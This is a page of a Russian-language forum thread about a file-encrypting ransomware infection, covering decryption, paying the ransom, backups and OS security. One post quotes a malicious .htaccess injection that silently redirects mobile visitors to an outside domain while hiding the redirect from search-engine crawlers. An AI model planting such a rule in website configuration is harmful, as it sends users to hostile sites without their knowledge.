Страница 2 из 6
o9uH
Не расшифруешь никак, а бабло если отправишь, то даже на спасибо не надейся hehe

Файлы не поддаются расшифровке т.к. там в конец файлов при шифровании мусор пишется, а при расшифровке выходит кyйня.

Можешь даже не пробовать расшифровывать. А если хочешь попробовать, то открывай WinRar-ом и запускай процедуру восстановления архива, но один хрен ничего не выйдет.

Тут спасут только бекапы, причем на другом компе и не в облаке, т.к. зашифрованные файлы весело синхронизируется в облака и у тя копии зашифрованных файлов в облаке hehe

У меня сеструха так похерила все рабочие базы 1С, открыла письмо от главбушки со сверкой hehe
Спасло, то что были выгрузки БД месячной давности.
Цифра
Говорят, что если бабки по указанным контактам шлешь, нефига там никаких кодов не присылают. Хотя можешь попробовать, за счет "нехорошего" человека и ему урок.

Добавлено спустя 46 секунд:

И да, юзайте линукс supercool
Denis
У меня компания одна обслуживается. И вот директор этой компании на прошлой неделе на домашнем компе поймал такой шифровальщик.
Пробовали разными дешифраторами и т.д. - не помогает.
На вирусинфо кто-то обращался с подобным шифровальщиком, там ответили что дешифровать не смогут.
Если более старые шифровальщики в директории писали файл с контактами, куда отправить бабло. То в этом случае есть только email адрес в названии файлов.

Кстати может коснуться каждого. Лучше не пожалейте 10 тысяч рублей, купите переносной HDD и делайте туда копии фоток и важных файлов.
Антивирусы эту хрень начинают ловить с запозданием.

Последний раз редактировалось: Denis (28 Сентября 2015 10:30), всего редактировалось 1 раз
o9uH
Цифра писал(а):

если бабки по указанным контактам шлешь, нефига там никаких кодов не присылают


и не пришлют, их просто нет. Кодеры разбирались с этими файлами, я выше писал уже, там мусор пишется в закодированные файлы, даже если и есть декодер, то он раскодирует битые файлы...
Denis
Цифра писал(а):

если бабки по указанным контактам шлешь, нефига там никаких кодов не присылают


а вот кстати не правда. ко мне год-полтора назад знакомые обратились с просьбой о помощи... некогда было ими заниматься, да и не факт что был бы результат.
так вот через неделю у него спросил, как с файлами то дела. он ответил, что всё расшифровали. отправили деньги на контактные данные, им дали дешифратор.

но скорее всего, конечно кинут, если отправить деньги
Victkh
В конторе только бекапы, на домашнем компе архивы можно хранить на диске с доступом только админа. А еще лучше не открывать всякие непонятные файлы и скрипты. lol1
Цифра
Victkh писал(а):

на домашнем компе архивы можно хранить на диске с доступом только админа


Да 99% сидят дома с админскими правами на мэйн аккаунте.
tim1202
стабильно раз в неделю приходит спам типа от судебных приставов, налоговой с отчетом в архиве экзешник с этой байдой. шифруется всё: доки, фотки, архивы. правится не только начало или конец файла, но и в середине дописывается. так что не восстановить файлы
Extreme
забудь, тебе эти файлы уже не вернуть
o9uH
Denis писал(а):

год-полтора назад


первые версии можно было расшифровать, сча — без вариантов
Игорь123
gallrad писал(а):

виндовс г@$но



+100500

Где-то читал, под Linux известно 7 вирусов, для их установки требуется активное участие пользователя. Good
o9uH
Игорь123 писал(а):

для их установки требуется активное участие пользователя


из сырцов надо собирать самому? hehe
Mord_vin
S597SMRUS писал(а):

это не расшифрует


да что ты говоришь facepalm hehe
Игорь123
o9uH писал(а):

Игорь123 писал(а):

для их установки требуется активное участие пользователя


из сырцов надо собирать самому? hehe



А как еще? Pardon
Mord_vin
Игорь123 писал(а):

Где-то читал, под Linux известно 7 вирусов, для их установки требуется активное участие пользователя


facepalm ты это Андройду расскажи ROFL
Игорь123
Mord_vin писал(а):

Игорь123 писал(а):

Где-то читал, под Linux известно 7 вирусов, для их установки требуется активное участие пользователя


facepalm ты это Андройду расскажи ROFL



Там же только ядро на Linux. Хотя, видимо количество вирусов зависит от популярности ОС.
Sergol
Найди того у кого есть лицензионный антивирь - желательно компанию, а не частное лицо. Договорись чтобы они связались с техподдержкой с просьбу на расшифровку. Шанс есть. По крайней мере у нас из 5 случаев заражения разными видами енкодеров, в четырех файлы расшифровали. Правда для одного варианта код расшифровки нашелся месяца через 2-3.
tim1202
доктор веб отказался от такой услуги, сославшись на то, что пользователь сам запустил шифровальщик pst
Extreme
Mord_vin
покажи мне хоть одну вредоносную программу на андроиде которая запустится сама без моего участия и чем-либо навредит трубе?
ПрапорЪ
мдэ... а чтобы эта хренб начала шифровать файлы, она ведь, для начала, должна установиться? Т.е. если скрипт или установочный файл вируса проникнет в систему, то он изначально должен получить разрешение на установку ведь? Я к тому, что виндовый UAC (как минимум) или другой брандмауэр/фаерволл должны известить о том, что "какая-то ху..та пытается запуститься! Разрешить?/Блокировать?"
Mord_vin
Extreme писал(а):

Mord_vin
покажи мне хоть одну вредоносную программу на андроиде которая запустится сама без моего участия и чем-либо навредит трубе?


установив какой либо непроверенный софт, труба может сама звонить на платные номера, отправлять sms, фотографировать и отправлять фотографии злоумышленнику, вести слежку с помощью GPS и т.д., этого мало ?
и ты не будешь об этом знать, просто в настройках трояна вывод информации на дисплей будет стоять в falsh Pardon

вот один из примеров самостоятельно редактирования вирусом всех .htaccess

Цитата:

01.
<IfModule mod_rewrite.c>
02.

03.
RewriteEngine on
04.

05.
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
06.

07.
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
08.

09.
RewriteRule (.*) http://comite.ru/?1 [L,R=302] # on
10.

11.
RewriteRule ^([a-z]=.*) index.php?$1 [L,NE]
12.

13.
</IfModule>



Итог: твой телефон сам отправляет sms ки 63 права root для редактирования .htaccess не нужны ROFL

Последний раз редактировалось: Mord_vin (28 Сентября 2015 13:09), всего редактировалось 1 раз
o9uH
Alexxx753 писал(а):

Я к тому, что виндовый UAC (как минимум) или другой брандмауэр/фаерволл должны известить о том, что "какая-то ху..та пытается запуститься! Разрешить?/Блокировать?"


ты думаешь это останавливает "опытного" пользователя?
у меня сеструха шифровальщика запустила, базы 1С все похерились.
я ей восстановил всё.

через день она решила установить Internet Explorer, который и так в винде есть и ведь установила!
а я потом два дня мудохался вычищал всё hehe
Extreme
Mord_vin
ключевое слово УСТАНОВИВ
т.е. пользователь сам себе злобный буратин, если он такой дебил и ставит что непопадя. И то при установке ведроид покажет все разрешения которые требуются программе, что тоже повод задуматься. все вирусы на ведре и линуксе запускаются только с помощью пользователя, в отличие от винды, где вставил заразную флешку и привет Pardon

ваще ржу с дебилов ставящих антивирусы на андроид pst
Mord_vin
Extreme писал(а):

ваще ржу с дебилов ставящих антивирусы на андроид


а с тех что не ставит pst

Добавлено спустя 2 минуты 29 секунд:

Extreme писал(а):

т.е. пользователь сам себе злобный буратин, если он такой дебил и ставит что непопадя.


а как угадать что поподя, а что нет? проверить софтину (нужная или не нужная) можно только установив на систему Pardon а playmarket забит софтом lol1
Цифра
Extreme писал(а):

ваще ржу с дебилов ставящих антивирусы на андроид


Ну я такой. Есть лицензия на 3 машины на KIS, две на настольнике и ноуте, а третью куда девать? Заюзал на мобиле.
Новая тема Ответить на тему
Показать сообщения:
Страница 2 из 6
Перейти:
ИНФОРМАЦИЯ ПО ИКОНКАМ И ВОЗМОЖНОСТЯМ

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете вкладывать файлы
Вы можете скачивать файлы